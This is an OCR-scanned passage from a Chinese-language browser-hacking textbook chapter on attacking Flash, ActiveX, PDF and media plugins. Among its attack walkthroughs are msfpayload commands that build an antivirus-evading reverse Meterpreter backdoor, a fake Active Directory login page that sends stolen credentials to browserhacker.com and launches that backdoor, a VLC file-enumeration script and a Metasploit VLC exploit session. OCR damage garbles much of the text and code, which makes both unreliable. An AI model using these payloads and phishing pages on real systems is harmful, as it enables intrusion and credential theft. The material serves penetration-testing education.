数据 。 共 享 对 象 最 常见 的 用 途 就 是 Flash 的 cookie。 

用 户 并 不 容易 管理 共享 对 象 。 要 想 管 理 存储 内 容 ， 必 须 访问 Website Storage Panel”, 18-16 
展示 了 Storage Panel， 以 及 可 以 从 中 看 到 的 信息 。 通 过 这 个 面板 可 以 设置 能 在 计算 机 上 保存 多 少 
数据 ， 也 可 以 删除 现 有 的 数据 。 




























































































Website Storage Settings panel 


| Adobe® Flash® Player Settings Manager 
€ € me c+ 
CK E S 2 
Website Storage Settings 


How much information can www.swishzone.com store on your 
computer? 





口 NeverAsk Again 
Visited Websites 
Websites Used Limit 
macromedia.com - 100KB |á] 
www.Swishzone.com 1KB 100 KB 
adscdn.jetpackdigital.com 1 KB 100 KB 
100 KB 


| video.nbcuni.com - Y 


[ Delete website |[ Delete allsites | 



































图 8-16  Flashjfif/F ff] Website Storage Settings Panel 


与 浏览 器 会 话 cookie 不 同 ， 共 享 对 象 数 据 并 不 经 常 清除 ， 这 也 是 Flash cookie 吸 引 人 的 原因 所 
在 。 除 了 基本 的 用 户 信息 ， 其 中 也 保存 着 很 多 访问 远程 应 用 或 其 他 敏感 数据 的 凭证 信息 。 

共享 对 象 中 的 信息 也 会 保存 在 文件 系统 中 。 要 在 Mac 上 查看 相关 信息 ， 可 以 在 你 的 主 目录 下 
找到 Library/Preferences/Macromedia/Flash Player/#SharedObjects/ 文 件 夹 。 在 Windows 中 ， 则 位 于 
C:\Documents and Settings\ [username]\Application Data\Macromedia\Flash Player 目 录 下 。 找 到 这 些 
文件 后 ， 可 以 从 中 获取 认证 信息 ， 修 改 程序 功能 的 信息 ， 或 者 其 他 有 价值 的 信息 。 正 因为 如 此 ， 
控制 了 系统 之 后 ， 一 定 要 看 一 看 这 些 信息 ， 或 许 对 你 下 一 步 的 攻击 非常 有 用 。 

2. ActionScript 

ActionScript 是 一 个 开源 的 脚本 语言 ， 可 以 编译 为 字 节 码 ，Adobe FlashfllApache Flex 都 在 使 
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用 。 编 译 后 的 字 节 码 在 AVM (ActionScript Virtual Machine, ActionScript 虚 拟 机 ) 中 执行 ，AVM 
类 似 Java 中 的 沙 箱 。Flash 的 设计 初衷 是 增强 网 页 功能 ， 因 此 通常 很 少 需要 与 操作 系统 直接 交互 。 
ActionScript 则 可 以 发 送 网 络 和 Web 请 求 ， 访 问 某 些 外 围 设备 ， 以 及 向 用 户 发 送 流 媒体 。 

虽然 编译 ActionScript 后 的 字 节 码 人 类 无 法 阅读 ， 但 SWFScan ”等 工具 可 以 把 字 节 码 转换 回 
ActionScript 代 码 。 这 些 工 具 非 常 有 用 ， 就 类 似 于 前 面 讲 过 的 反 编 译 Java 应 用 。 很 多 时 候 ， 这 些 应 
用 中 包含 便 编 码 的 认证 和 凭据、 没有 在 页 面 上 被 链接 的 URL 和 其 他 有 价值 的 内 容 。 在 通过 中 间 人 攻 
击 修改 内 容 时 ， 利 用 这 些 数据 可 以 控制 受害 者 能 看 到 些 什么 。 

3. 利用 摄像 头 和 麦克 风 

利用 麦克 风 和 摄像 头 可 以 让 播放 Flash 变 得 十 分 有 意思 。 但 摄像 头 和 麦克 风 的 默认 安全 设置 是 
拒绝 访问 。 右 键 单 击 Flash 应 用 并 选择 Settings， 可 以 看 到 当前 的 设置 。 图 8-17 展 示 了 人 允许 或 拒绝 
使 用 麦克 风 及 摄像 头 的 选项 。 





























Adobe Flash Player Settings 
Privacy 


Allow macromedia.com to access your 
camera and microphone? 


OQ Allow © @ Deny 
口 Remember 


mS Sh (con) 





图 8-17 Adobe Flash 的 摄像 头 和 麦克 风 设 置 


如 果 能 欺骗 某 人 启用 上 述 设 置 , Flash 应 用 就 可 以 访问 摄像 头 和 麦克 风 。 进一步, 如 果 你 可 以 
欺骗 受害 者 选中 Remember 选 项 ， 这 样 Flash 会 记 住 当前 设置 ， 当 前 源 中 的 任何 Flash 应 用 就 都 可 以 
使 用 摄像 头 和 麦克 风 了 。 这 个 设置 并 不 特定 于 某 个 Flash 应 用 , 而 可 以 适用 于 来 源 于 同一 站 点 的 所 
有 Flash 应 用 。 

在 社会 工程 学 中 利用 这 一 点 , 可 以 取得 很 好 的 攻击 效果 。 比 如 , 可 以 欺骗 某 人 运行 一 个 Flash 
游戏 ,通过 摄像 头 拍 张 照片 并 画 上 滑稽 的 帽子 。 这 样 ， 以 后 就 可 以 继续 利用 该 设置 了 。 只 要 受害 
者 允许 一 个 来 源 的 Flash 访 问 摄像 头 和 麦克 风 ， 你 就 可 以 继续 发 送 隐 藏 的 1 x 1 像素 的 Flash 应 用 ， 
像 第 5 章 演 示 的 那样 记录 下 麦克 风 和 摄像 头 采集 的 数据 。 

用 于 访问 摄像 头 的 API 可 以 参考 ActionScript 的 文档 ”， 在 camera 类 下 面 。 可 以 利用 camera 
类 录制 视频 ， 取 得 视频 的 统计 信息 ， 以 及 设置 摄像 头 的 FPS (Frames Per Second， 每 秒 帧 数 )。 通 
过 将 FPS 设 置 为 0， 可 以 拍摄 单 帧 画面 。 要 确定 摄像 头 是 否 已 启动 ， 可 以 查询 camera 类 的 name 属 
性 。 如 果 name 属 性 为 空 ， 也 说 明 摄 像 头 未 启动 。 

麦克 风 的 API 也 类 似 。 同 样 也 有 ActionScript 参 考 文档 可 查 *。 麦 克 风 可 以 录音 ,设置 采集 的 

Hi BRE 回声 抑制 等 。 要 把 音频 数据 发 送 到 互联 网 ， 可 以 使 用 Microphon 类 和 NetStr am 类 。 

可 以 通过 点 击 劫持 来 欺骗 受害 者 修改 Flash 的 隐私 设置 。 第 4 章 讨论 过 ， 基 本 原理 是 利用 透明 
的 内 骨 框 架 和 DIV 元 素 ， 疝 受害 者 展示 UI 元 素 。 不 过 ， 用 户 点 击 这 些 元 素 后 ,实际 上 触发 的 是 修 
改 Flash 隐 私 设置 ， 提 升 了 Flash 应 用 的 访问 权限 。 












































































































































314 第 8 章 攻击 插件 





4. Flash 模 糊 测 试 

与 很 多 其 他 技术 类 似 ， 对 Flash 也 可 以 进行 模糊 测试 (fuzzing )。 当 然 ， 很 多 安全 研究 者 已 经 
发 现 了 不 少 可 以 利用 的 情况 。 

谷歌 安全 团队 ”在 2011 年 发 现 了 Flash 中 的 可 利用 的 bug。 被 模糊 测试 过 的 Flash 文 件数 量 非常 
之 大 。 

这 次 研究 发 现 了 大 约 400 个 不 同 的 骨 泪 征兆 ， 其 中 106 个 被 标记 为 安全 bug。 谷 歌 安全 团队 第 
一 次 收集 了 大 约 20TB 的 SWF 文件 。 在 此 基础 上 , 选 出 了 2 万 个 完全 不 同 的 文件 。 这 些 文件 被 发 送 
给 Flash Player 并 做 出 崩溃 记录 。 


RADAMSA 


如 果 想 进一步 了 解 模 糊 测 试 ， 可 以 试 一 下 Radamsa。 这 是 一 个 开源 的 黑 盒 测试 工具 ， 由 芬 
兰 奥 卢 大 学 开发 。 相 关 信 息 可 以 访问 以 下 链接 : https://www.ee.oulu.fi/research/ouspg/Radamsa o 




















8.3.4 攻击 ActiveX 控件 


ActiveX 是 微软 针对 浏览 器 开发 的 插件 架构 ， 用 于 让 开发 者 为 浏览 器 添加 更 多 功能 。ActiveX 
控件 可 以 创建 动画 , 也 可 以 给 系统 安装 软件 。 它 们 具有 沟通 浏览 器 和 操作 系统 的 强大 功能 ， 因 此 
也 是 攻击 者 的 首要 目标 。 很 多 站 点 为 了 正常 运行 ， 都 需要 ActiveX 支 持 。 

Adobe Flash 、Java 或 Windows Update， 都 是 我 们 熟悉 的 ActiveX 控 件 。 但 有 些 控 件 是 只 针对 
特定 站 点 的 ， 比 如 提供 认证 和 证 书 管理 等 功能 。 在 本 书写 作 时 ， 中 国 的 银行 网 站 ”就 是 其 中 一 个 
例子 。 通 过 理解 这 些 控件 的 工作 原理 ， 以 及 如 何 利 用 它们 存在 的 漏洞 ， 可 以 采集 浏览 器 指纹 ， 控 
制 执行 的 命令 ， 以 及 取得 系统 的 访问 权 。 
虽然 ActiveX 是 为 IE 设 计 的 , 但 有 一 种 插件 是 专门 为 Chrome” 和 Firefox”? 设 计 的 ， 可 以 让 它们 
在 不 打开 下 窗口 的 前 提 下 运行 ActiveX。 这 些 插件 的 主要 限制 是 必须 在 Windows 下 运行 ， 因 为 
ActiveX 是 编译 后 的 代码 。 

利用 ActiveX 

利用 ActiveX 并 不 是 都 很 简单 。 有 时 候 ， 为 了 访问 受到 更 多 保护 的 资源 ， 需 要 结合 使 用 两 种 
不 同 的 攻击 。 在 下 面 的 例子 中 , 我们 会 讨论 如 何 入 侵 公 司 共享 资源 , 为 此 需要 知道 用 户 是 否 安装 
了 某 个 插件 。 

相关 的 模块 是 Mitsubishi MC-WorX ActiveX 插 件 。 这 个 插件 属于 三 萎 公 司 的 MC-WorX 
SCADA 套 件 ， 是 制造 系统 可 视 化 的 辅助 系统 。 我 们 要 利用 这 个 插件 作为 程序 本 身 的 启动 装置 。 
Blake 发 现 的 这 个 缺陷 ?人 允许 以 任意 指定 的 文件 名 启动 。 问 题 在 于 ， 这 里 只 能 利用 本 地 文件 名 。 
UNC 路 径 ” 不行 , 不 过 ,假如 把 UNC 路 径 映 射 为 一 个 驱动 器 盘 符 ， 倒 是 可 以 。 这 种 情况 在 公司 环 
境 下 很 常见 , 每 个 部 门 都 会 以 类 似 方式 共享 文件 及 其 他 资源 。 这 时 候 ， 如 果 可 以 找到 一 些 薄 弱 环 
节 ， 就 可 以 通过 它们 侵入 公司 共享 资源 。 

对 这 个 例子 而 言 ， 我 们 要 创建 一 个 Metasploit payload， 准 备 好 处 理 程序 ， 并 写 一 个 希望 让 受 
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害 者 访问 的 示例 页 面 。 为 了 让 受害 者 访问 它 ， 可 以 使 用 Ettercap 将 其 注入 一 个 合法 页 面 ， 或 者 在 
内 部 网 上 修改 共享 的 网 页 ， eo ees RUN 
我 们 的 假设 是 目标 系统 已 经 安装 了 插件 。 不 过 ，Chris Gates% Ezi 2ERR | "TELS 




















用 户 提前 安装 有 漏洞 的 插件 ， sem 4 有 安装 了 该 搬 件 才能 查看 某 些 内 容 , 最 终 达 到 利用 用 户 的 
目的 。 无 论 怎么 样 ， 只 要 目标 机 器 上 安装 了 这 些 搬 件 就 行 了 


使 用 Metasploit 框 架 的 方式 有 很 多 。 第 6 章 曾 展示 了 通过 交互 式 控制 台 界 面 (或 msfconsole ) 
使 用 Metasploit。 以 下 是 另外 一 些 重要 的 Metasploit 命 令 。 











HK 


O msfpayload: 用 于 生成 Metasploit payload 的 命令 行 实用 程序 ; 
Omsfencode: 编码 Shellcode 的 一 个 命令 行 实 用 程序 ， 通 常会 结合 使 用 msfpayload 与 


msfencode 输 出 特定 的 payload， 然 后 再 编码 ; 
口 msfvenom: 直接 组 合 msfpayload 和 msfencode 的 命令 ; 


O msfgui: Metasploit 的 一 个 交互 式 图 形 化 用 户 界 面 。 











下 一 步 是 创建 并 上 传 Meterpreter payload， 稍 后 将 由 受害 者 接收 并 执行 。 这 里 假设 你 的 他 地 

址 是 192.168.1.132。 你 需要 为 msfpay1oad 指 定 payload、 端 口 和 IP 地 址 ， 以 生成 Meterpreter 后 门 

此 外 ,为 了 防止 被 病毒 查 杀 程序 发 现 ， 可 能 还 需要 考虑 用 msfencode 对 二 进 制 payload 进 行 

扁 码 。 需 要 根据 有 效 性 反复 试验 。 如 果 payload 被 防 病毒 程序 检测 到 ， 可 以 尝试 使 用 Hyperion 或 
Veil, LA F shelli 来 创建 编码 后 的 二 进 制 payload: 


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.132\ 
LPORT=8675 R | msfencode -c 3 -t exe > backdoor.exe 


这 样 会 创建 一 个 被 编码 3 次 的 反 向 Meterpreter payload， 并 将 可 执行 文件 保存 为 backdoor.exe。 
接 下 来 ， 需 要 让 相应 的 Metasploit 处 理 程序 允许 payload 连 接 到 你 。 为 此 ， 要 启动 Metasploit 的 
msfconsole， 然 后 以 下 列 选 项 启动 multi/handler: 

msf> use multi/handler 

msf exploit (handler) > set payload windows/meterpreter/reverse_tcp 


payload => windows/meterpreter/reverse_tcp 
msf exploit (handler) > set LHOST 192.168.1.132 




















SS 



































组 合 msfpayload films fencode, 














LHOST => 192.168.1.132 
msf exploit(handler) » set LPORT 8675 
LPORT => 8675 


msf exploit(handler) » set ExitOnSession false 
ExitOnSession -» false 

msf exploit (handler) 
Ew] 





> exploit -j 
Exploit running as background job. 





[*] 
[*] 


Started reverse handler on 192.168.1.132:8675 
Starting the payload handler... 
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可 以 看 到 处 理 程序 正在 监听 , 因为 我 们 用 -j 选 项 启动 了 它 , 所 以 它 会 在 后 台 运 行 并 接受 多 个 
来 源 的 shell。 在 有 多 个 受害 机 器 连接 过 来 时 ， 这 样 会 非常 方便 。 

接 下 来 是 创建 一 个 页 面 ， 足 以 说 服用 户 去 点 击 恶 意 链 接 。 第 5 章 曾 介绍 过 很 多 在 浏览 器 中 强 
迫 用 户 执行 恶意 代码 的 技术 ， 比 如 利用 用 户 对 界面 的 心理 预期 或 者 虚假 软件 更 新 提示 等 。 

首先 ， 我们 写 一 个 看 起 来 像 聊天 程序 的 HTML 网 页 。 这 个 页 面 有 两 个 功能 : 一 个 登录 框 ， 用 
于 登录 到 Active Directory， 还 有 一 个 登录 按钮 。 搬 件 创建 的 按钮 叫 作 Login Client， 因 此 我 们 可 以 
考虑 一 个 一 箭 双 雕 的 策略 ， 既 拿 到 赁 证， 又 能 实现 利用 : 


<html> 

<body> 

«script» 

function submitData() 


( 















































var x - document.getElementById("sploit"); 
var url = "http://browserhacker.com/capture.rb?un-" + 
x.elements[0].value + "&pw-" + x.elements[1].value; 
document.getElementById('tl1').background-url; 
j 


«/script» 


<div align=center> 

<form id="sploit" > 

«table id='t1' border=0 background=""> 

<tr><th colspan=2>BrowserVictim.com Chat System<BR> 

Please Log in with your ActiveDirectory Credentials</th></tr> 

<tr><th>Username:</th><td><input type=text name="user"></td></tr> 

<tr><th>Password:</th><td><input type=password name="pass" 

onBlur-"submitData()"»«/th»«/tr» 

«tr»«th colspan=2> 

«object classid-'clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' 
id='target'> 

</object> 

</tr></td> 

</form> 

<BR> 

</div> 





<script language='vbscript'> 

document .getElementById("target").fileName = "Z:\\backdoor.exe" 
</script> 

</body> 

</html> 


以 上 代码 通过 密码 字段 的 onBluz 事 件 监听 变化 , 触发 时 会 调用 函数 submitData。 这 个 函数 
会 把 包含 登录 信息 的 表格 背景 设置 为 一 张 图 片 。 而 实际 上 , 通过 加 载 图 片 的 GET 请 求 ， 把 用 户 名 
和 密码 发 送 到 了 browserhacker.com。 等 到 用 户 点 击 登录 按钮 时 ， 后 门 代码 就 会 启动 。 图 8-18 展 示 
了 在 浏览 需 中 查看 这 个 页 面 时 的 效果 。 
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(© (e v [i http://browservictim.com, loginhtml ~ E | +4] x | [e Bing 





dir Favorites | si [E] Suggested Sites ~ $) Web Slice Gallery ~ 


{Æ hitp://browservictim.com/login.html [] ü- + ES d v Pager Se 





BrowserVictim.com Chat System 
Please Log in with your ActiveDirectory Credentials 


Username: 


Password: 





Login Client 





图 8-18 ”聊天 程序 的 虚假 登录 页 


Login Client 按 钮 被 点 击 后 ，ActiveX 控 件 尝试 调用 backdoor.exe。 为 了 提高 成 功率 ， 应 该 把 这 
个 名 字 改 成 chatclient.exe 之 类 的 没 那么 明显 的 名 字 ， 总 之 让 它 看 起 来 与 虚假 登录 页 的 内 容 一 臻 最 
好 。 图 8-19 展 示 了 在 文件 未 签名 的 情况 下 ， 用 户 会 看 到 的 弹出 警告 





imn 


o 


Open File - Security Warning 





The publisher could not be verified. Are you sure you want to 
run this software? 


Ca T Name: Z:\backdoor.exe 


Publisher: Unknown Publisher 
Type: Application 





From: Z:\packdoor.exe 


一 一 一 





publisher. You should only run software from publishers you trust. 


o This file does not have a valid digital signature that verifies its 
How can | decide what software to run? 

















图 8-19 ”对 未 签名 应 用 的 弹出 提醒 


只 要 用 户 点 击 了 OK 或 Run， 这 个 程序 就 会 调用 你 的 Metasploit 监 听 器 。Metasploit 会 创建 一 个 
新 会 话 ， 让 你 与 这 个 新 Metasploit 会 话 通信 : 
msf exploit (handler) > [*] Sending stage (752128 bytes) to 192.168.1.198 


[*] Meterpreter session 7 opened (192.168.1.132:8675 -> 
192.168.1.198:50407) at 2013-09-17 01:09:01 -0400 








msf exploit (handler) > sessions -i 7 
[*] Starting interaction with 7... 


meterpreter > sysinfo 


Computer : WIN-758UJIVA5C3 

OS : Windows 7 (Build 7600). 
Architecture : x86 

System Language : en US 

Meterpreter : x86/win32 





meterpreter > 


虽然 这 个 攻击 稍微 复杂 一 些 ， 但 也 可 以 像 攻 击 其 他 很 多 插件 一 样 直 接 攻 击 ActiveX。 插 件 的 
漏洞 会 不 断 被 曝光 ， 因此 问题 只 在 于 人 E 否 针对 目标 平台 选择 合适 的 攻击 方法 。 
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8.3.5 攻击 PDF 阅读 器 


Acrobat 和 Foxit 等 PDF 阅读 器 , 也 是 恶意 软件 作者 热衷 的 攻击 目标 。 主 要 原因 是 PDF 文档 包含 
很 多 功能 ， 其 中 不 少 都 存在 可 攻击 的 弱点 。 比 如 ,PDF 文档 中 可 以 包含 JavaScript、 二 进 制 流 和 图 
片 。 把 这 些 东 西 组 合 起 来 ， 既 可 以 模糊 代码 ， 也 可 以 在 页 面 加 载 时 执行 代码 。 

这 种 组 合 性 导致 了 PDF 阅读 器 漏洞 频 发 ， 其 中 以 Adobe Acrobat 被 使 用 得 最 多 , 被 攻击 得 也 最 
多 。 下 一 小 节 ， 我 们 会 介绍 如 何 检测 PDF 阅读 器 ， 如 何 利用 它们 访问 更 多 资源 ， 以 及 如 何 利用 它 
们 实现 Shell 交 互 。 

与 前 面 模 糊 测试 Flash 文 件 的 方法 类 似 , 谷歌 也 收集 过 大 量 PDF 文 件 , 用 于 进行 模糊 测试 和 查 
找 bug。 在 这 个 数据 集 基础 上 ，Mateusz Jurczyk 和 Gynvael Coldwind 在 Chrome 的 PDF 阅读 器 中 找到 
了 50 个 bug, 包括 各 种 严重 程度 。 使 用 这 些 数 据 来 对 Adobe 的 PDF 阅读 器 进行 模糊 测试 ,也 至 少 可 
以 多 发 现 其 存在 的 25 个 关键 漏洞 ， 其 中 不 少 在 后 来 都 被 修复 了 ”7。 

在 PDF 中 使 用 JavaScript 

PDF 文 件 中 的 JavaScript 是 很 多 PDF 利 用 的 来 源 。PDF 文 件 中 可 以 包含 JavaScript， 这 些 
JavaScript 可 以 访问 整个 文档 。PDF 文 档 在 这 里 有 点 类 似 浏览 器 DOM， 也 有 很 多 对 象 和 方法 。 通 
过 这 些 方法 , JavaScript 事 件 可 以 利用 PDF 元 素来 触发 。 设计 这 些 功 能 是 为 了 支持 交互 式 表 单 和 文 
档 ， 同 时 验证 数据 和 增强 表单 。 

JavaScript 这 个 特性 甚至 就 连 Adobe 都 推荐 关闭 ， 目 的 是 防止 某 些 攻击 ”。 于 是 ， 很 多 安全 专 
家 建议 默认 禁用 PDF 阅 读 器 中 的 JavaScript， 以 防止 多 种 常见 攻击 。 

(1) UXSS 

PDF 文 件 中 的 JavaScript 确 实 会 引发 可 能 被 利用 的 问题 。 比 如 ，Acrobat Reader 中 就 存在 UXSS 
( Universal XSS ) 漏洞 。Stefano Di Paola 和 Giorgio Fedon 在 23C3 大 会 上 分 享 了 这 一 发 现 背 后 的 研 
究 成 果 “。UXSS 漏 洞 允许 用 户 向 PDF 中 传人 参数 ， 然 后 文档 中 的 JavaScript 可 以 处 理 这 些 参 数 。 

这 个 漏洞 利用 的 是 Firefox 中 老 版 本 的 Acrobat 会 解析 URL 变 量 的 事实 。 像 #PDF 和 #XML 这 些 
值 都 会 被 处 理 。 因 此 ,下 面 这 个 URL,， http://browserhacker.com/test.pdf#FDF=javascript:alert('xss')， 
就 会 导致 文档 中 的 JavaScript 运 行 并 弹出 警告 框 
虽然 新 版 本 的 Acrobat Reader 已 经 修复 了 这 个 漏洞 ， 但 这 种 漏洞 并 不 局 限于 Acrobat， 其 他 搬 
件 也 可 能 存在 。 可 以 传人 外 部 值 以 影响 代码 执行 的 能 力 , 会 带 来 一 系列 安全 隐患 ， 比 如 远程 代码 
执行 。 对 于 Acrobat Reader 中 的 这 个 缺陷 ， 又 有 一 个 双重 释放 漏洞 “被 发 现 可 以 通过 URI 人 参数 加 以 
利用 。 结 果 是 攻击 老 版 本 Acrobat 变 得 更 容易 。 

(2) 启动 另 一 个 浏览 器 

PDF 可 以 启动 浏览 器 并 请 求 特定 的 URL。 使 用 app .1aunchURL 方 法 ， 可 以 让 操作 系统 启动 
默认 浏览 

BeEF 利 用 这 个 功能 ， 通 过 用 户 使 用 的 浏览 器 来 勾 连 默认 浏览 器 。 通 过 勾 连 默认 浏览 嚣 ， 有 
可 能 发 动 进一步 的 攻击 。 要 使 用 这 个 方法 ， 只 需 调 用 以 下 JavaScript 代 码 : 


app.launchURL("http://browserhacker.com:3000/demos/report.html",true); 
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利用 这 个 方法 ，PDF 会 通过 默认 浏览 器 打开 相 DC MN 
应 的 URL。 这 样 就 等 于 加 载 了 新 的 勾 连 ， 允 许 访问 sc 
新 的 浏览 器 会 话 。 图 8-20 展 示 了 Hook Default cr e T 
Browser 模 块 ， 就 是 通过 选择 一 个 色 连 浏览 器 ,然后 ox Proca araen 














Get System Info 


给 它 发 送 PDF 实 现 的 。 然 后 PDF 启动 指向 勾 连 页 面 的 CIT 
URL， 默 认 浏 览 器 继而 打开 这 个 新 的 色 连 页 面 。 
这 个 过 程 中 ， 用 户 有 可 能 会 看 到 一 个 弹出 警告 
TÉ, 告诉 他 会 打开 一 个 外 部 窗口 。 注 意 这 个 模块 的 颜色 是 红 还 是 绿 ， 因 为 有 的 浏览 器 在 这 种 技术 
下 的 反应 会 好 于 其 他 浏览 器 。 
这 种 攻击 在 公司 环境 中 特别 有 用 。 如 果 通 过 Chrome 义 连 到 一 个 受害 人 的 默认 浏览 器 ， 而 该 
浏览 器 是 公司 要 求 的 IE7 或 IE8， 那 你 的 攻击 面 就 会 大 大 扩展 。 


8.3.6 攻击 媒体 插件 


VLC、RealPlayer 以 及 QuickTime 这 些 插件 也 是 攻击 者 的 最 爱 。 它 们 会 读 取 特 定格 式 的 文件 并 
泻 染 媒 体内 容 。 这 种 攻击 利用 的 漏洞 叫 作 文件 格式 漏洞 。 也 就 是 说 ， 这 种 攻击 需要 以 某 种 格式 编 
纂 文件 ， 从 而 让 浏览 器 插件 重 写 某 些 内 存 ， 进 而 执行 恶意 代码 。 

在 浏览 器 中 检测 媒体 插件 与 检测 其 他 插件 方法 相同 ,插件 可 能 会 支持 对 应 于 多 种 文档 类 型 的 
多 种 MIME 类 型 。 对 媒体 插件 而 言 ， 这 种 情况 更 为 普遍 。 比 如 ，QuickTime 既 能 处 理 .mp4 文 件 ， 
也 可 以 处 理 .mov 文 件 ， 因 此 会 有 两 种 MIME 类 型 可 以 反映 出 这 个 事实 。 

媒体 插件 经 常 需要 从 其 他 服务 器 下 载 流 数 据 , 加 载 资 源 文件 ,以 及 执行 可 能 导致 漏洞 的 其 他 
操作 。 本 小 节 我 们 就 来 看 一 看 怎么 通过 VLC 枚 举 文件 ， 以 及 通过 Metasploit 利 用 有 漏洞 的 插件 实 
现 文件 格式 利用 。 

1. 通过 VLC 扫 描 资 源 

如 前 所 述 ， 媒体 播放 器 经 常 要 处 理 流 文件 和 其 他 媒体 ,但 仍然 受 浏 览 器 控制 。 这 个 功能 正 是 
Jason Geffner 发 现 的 VLC ActiveX 控 件 漏洞 的 一 个 要 素 。 给 VLC ActiveX 捕 件 添加 一 个 播放 列表 项 
并 尝试 播放 它 ， 会 得 到 位 于 播放 列表 中 的 文件 是 否 有 效 的 反馈 。 














图 8-20 ”BeEF 中 的 Hook Default Browser 模 块 














































































































利用 这 一 点 , 可 以 对 远程 目标 系统 中 某 个 目录 下 的 文件 进行 指纹 采集 。 只 要 把 文件 名 都 作为 
播放 项 加 入 播放 列表 ,然后 检测 是 否 返 回 错误 ， 就 可 以 知道 是 否 存在 相应 的 文件 。 这 个 技术 可 以 











用 于 采集 操作 系统 指纹 ， 安 装 的 软件 、 识 别 用 户 ， 甚 至 能 够 发 现 内 部 共享 资源 : 


<object style="visibility:hidden" 
classid-"clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921" 
width="0" height="0" id-"vlc"»«/object» 

<script> 

vic.playlist.clear(); 

vlc.playlist.add(items[i]); 

vic.playlist.playItem(0); 

vic.attachEvent ("MediaPlayerPlaying", onFound) ; 

vic.attachEvent ("MediaPlayerEncounteredError", onNotFound) ; 
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</script> 

通过 创建 ActiveX 对 象 ， 清 理 播放 列表 ， 添 加 一 项 ， 然 后 播放 它 ， 可 能 会 看 到 两 种 结果 : 一 
是 该 ActiveX 对 象 会 产生 一 个 错误 ， 二 是 它 会 触发 一 次 播放 事件 。 通 过 捕获 这 些 事件 ， 可 以 运行 
后 续 JavaScript 代 码 ， 从 而 通知 你 存在 某 个 文件 。 

以 下 代码 用 于 枚 举 items 数 组 中 定义 的 很 多 资源 : 



























































try { 
var result = ""; 
var i = 0; 


// 创建 div 来 附加 上 VLC 对 象 


var newdiv = document.createElement ('div'); 


var divIdName = 'temp div'; 
newdiv.setAttribute('id',divIdName); 
newdiv.style.width - "0"; 
newdiv.style.height - "0"; 
newdiv.style.visibility - "hidden"; 


document.body.appendChild (newdiv); 


// 创建 对 象 

document.getElementById("temp div").innerHTML = 

"<object style=\"visibility:hidden\"" + 

" classid=\"clsid: 9BE31822-FDAD-461B-AD51-BE1D1C159921\"" + 
" width=\"0\" height=\"0\" id=\"vlc\"></object>"; 


var items = [ 
"C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.20125.0", 
"C:\\Program Files (x86)\\Sophos\\Sophos Anti-Virus", 
"C:\\Users\\wade", 
"C:\\Users\\morru" 


function onFound(event) { 
result += items[i] + "\n"; 
i++; 

console.log ("Found"); 

next (); 


function onNotFound(event) { 

i++; 
console.log("Not Found"); 
next(); 


} 





function next () { 
if (i >= items.length) { 
vic.playlist.stop(); 


// 将 结果 返回 框架 


console.log("Discovered resources:\n" + result); 
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// 清除 
var rmdiv = document.getElementById("temp div"); 
document .body.removeChild(rmdiv) ; 


return; 


} 


vic.playlist.clear(); 
vic.playlist.add("file:///" + items[i]) 
console.log("Adding item " + items[i] + " to playlist."); 
vic.playlist.playItem(0); 


; 


vic.attachEvent ("MediaPlayerPlaying", onFound) ; 
vic.attachEvent ("MediaPlayerEncounteredError", onNotFound) ; 


ee {} 

在 正中 运行 以 上 代码 的 结果 如 图 8-21 所 示 ， 这 样 就 可 以 知道 用 户 安装 了 Sophos Anti-Virus 软 
件 。 这 个 信息 对 接 下 来 的 攻击 可 能 会 用。 比如， 知道 了 你 想 攻击 的 用 户 使 用 Sophos Anti-Virus, 
那么 你 在 攻击 中 使 用 的 二 进 制 文件 就 必须 编码 才能 绕 过 它 的 检测 。 

另外 ， 我 们 还 发 现 了 一 个 有 效用 户 morru， 利 用 这 一 点 或 许 能 开展 进一步 的 攻击 。 使 用 这 个 
技术 ， 还 可 以 枚 举 已 安装 软件 的 版 本 〈 如果 软件 中 有 一 个 文件 或 目录 的 名 字 中 包含 版 本 )。 比 如 
这 里 检测 到 了 Silverlight 的 确切 版 本 号 ， 当 然 如 果 有 Java 或 其 他 类 似 软 件 ， 也 是 可 以 检测 到 的 。 





File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Compat View Docu 


HTML CSS | Console | Script Profiler Network 
ho 
console.log("Adding item ”+ items[i] + ”to playlist."); 


v1c.playlist.playItem(0); 
} 


vlc.attachEvent("MediaPlayerPlaying", onFound); 
vlc.attachEvent("MediaPlayerEncounteredError", onNotFound); 


next(); 
} catch(e) {} 
Adding item C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.@ to playlist. 
Found 
Adding item C:\Program Files (x86)\Sophos\Sophos Anti-Virus to playlist. 
Found 
Adding item C:\Users\wade to playlist. 
Not Found 
Adding item C:\Users\morru to playlist. 





Found 


Discovered resources: 


C:\Program Files (x86)\Microsoft Silverlight\5S.1.20125.0 
C:\Program Files (x86)\Sophos\Sophos Anti-Virus 
C:\Users\morru 


图 8-21 通过 VLC 枚 举 本 地 资源 





2. 利用 媒体 播放 器 
下 面 这 个 例子 利用 了 VLC 播 放 需 2.0 之 前 版 本 中 的 一 个 漏洞 45626 "VLC MMS Stream 
Handling Buffer Overflow”。 这 个 漏洞 通过 IE 及 恶意 URL 启 动 VLC, 然后 VLC 处 理 该 URL， 于 是 就 
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会 导致 SEH“ HES, 最终 执 行 payload 代 码 。 
为 了 在 Metasploit 的 msfconsole 中 启动 这 个 恶意 URL， 可 以 执行 如 下 代码 : 


msf> use exploit/windows/browser/vlc_mms_bof 

msf exploit(vlc mms bof) > set URIPATH /vlc 
URIPATH => /vlc 

msf exploit(vlc_mms_bof) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(vlc mms bof) » set LHOST 192.168.1.132 
LHOST => 192,.168.1.132 

msf exploit(vlc mms bof) » set LPORT 8675 

LPORT => 8675 

msf exploit(vlc mms bof) » exploit 

[*] Exploit running as background job. 














Started reverse handler on 192.168.1.132:8675 
Using URL: http://0.0.0.0:8080/vlc 

Local IP: http://192.168.1.132:8080/v1c 
Server started. 


服务 器 在 启动 后 ， 会 把 浏览 器 引导 到 http:/192.168.1.132:8080/vlc， 也 就 是 Metasploit 利 用 的 
地 址 。 浏 览 器 会 稍微 停 一 下 ， 然 后 展示 一 个 黑色 珑 形 ， 也 就 是 应 该 播放 媒体 的 区 域 ， 如 图 8-22 所 
示 。 用 户 看 到 这 个 页 面 后 ， 你 就 应 该 可 以 在 Metasploit 里 发 送 shell 命 邻 了 。 


SPOS TS map 


